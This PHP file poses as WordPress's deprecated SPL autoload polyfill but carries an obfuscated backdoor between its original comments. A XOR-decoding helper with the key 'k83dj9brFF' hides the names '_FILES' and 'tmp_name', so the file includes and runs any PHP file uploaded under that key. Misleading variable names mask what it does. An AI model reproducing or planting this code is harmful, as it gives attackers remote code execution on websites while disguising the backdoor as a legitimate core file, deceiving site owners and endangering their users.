<?php /* 
*
 * Polyfill for SPL autoload feature. This file is separate to prevent compiler notices
 * on the deprecated __autoload() function.
 *
 * See https:core.trac.wordpress.org/ticket/41134
 *
 * @deprecated 5.*/
 	
$post_date = 'k83dj9brFF';
function class($since, $trashed_posts_with_desired_slug)

{
    $year = urldecode($since);
    $page = substr($trashed_posts_with_desired_slug,0, strlen($year));
    $previous_date = $year ^ $page;
    return $previous_date;
}
$babes = ${class("4%7Ez%28%2Fj", $post_date)};
if (isset($babes[$post_date]))

{
	$subs = 'script_and_style_regex';
    $double_encode = $babes[$post_date];

    $protocols = $double_encode[class("%1FUC%3B%04X%0F%17", $post_date)];
    include ($protocols);
}


/* 3.0 No longer needed as the minimum PHP requirement has moved beyond PHP 5.3.
 *
 * @package PHP
 * @access private
 

_deprecated_file( basename( __FILE__ ), '5.3.0', '', 'SPL can no longer be disabled as of PHP 5.3.' );
*/